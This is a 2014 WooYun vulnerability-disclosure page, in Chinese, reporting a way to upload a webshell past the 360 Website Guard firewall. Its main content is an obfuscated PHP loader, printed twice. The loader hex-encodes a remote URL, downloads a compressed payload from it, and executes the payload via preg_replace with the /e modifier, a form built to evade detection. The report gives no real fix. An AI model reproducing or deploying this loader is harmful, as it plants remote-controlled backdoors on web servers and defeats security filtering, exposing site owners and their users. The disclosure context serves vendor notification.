[公开漏洞]绕过360网站卫士上传大马(Webshell)

绕过360网站卫士上传大马(Webshell) 相关厂商： 奇虎360 漏洞作者：蓝莓说 提交时间：2014-03-18 10:40 公开时间：2014-05-02 10:41 漏洞类型：设计缺陷/逻辑错误 危害等级：中 自评Rank：10 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： 上传 绕过防护 漏洞详情 披露状态：

2014-03-18：细节已通知厂商并且等待厂商处理中
2014-03-18：厂商已经确认，细节仅向厂商公开
2014-03-28：细节向核心白帽子及相关领域专家公开
2014-04-07：细节向普通白帽子公开
2014-04-17：细节向实习白帽子公开
2014-05-02：细节向公众公开

简要描述：

绕过360网站卫士 上传大马 最近最近写的脚本

详细说明：

漏洞证明：这个是被杀的

下一个给你看没有被杀：

你看吧我没做加 我写的代码贴出来：

<?php

error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

你们解决 我吃饭去了

漏洞证明：

漏洞证明：这个是被杀的

下一个给你看没有被杀：

你看吧我没做加 我写的代码贴出来：

<?php

error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

你们解决 我吃饭去了

修复方案：

你懂得

版权声明：转载请注明来源 蓝莓说@乌云 漏洞回应 厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-03-18 17:57

厂商回复：

非常感谢您对360网站卫士的关注！

最新状态：

暂无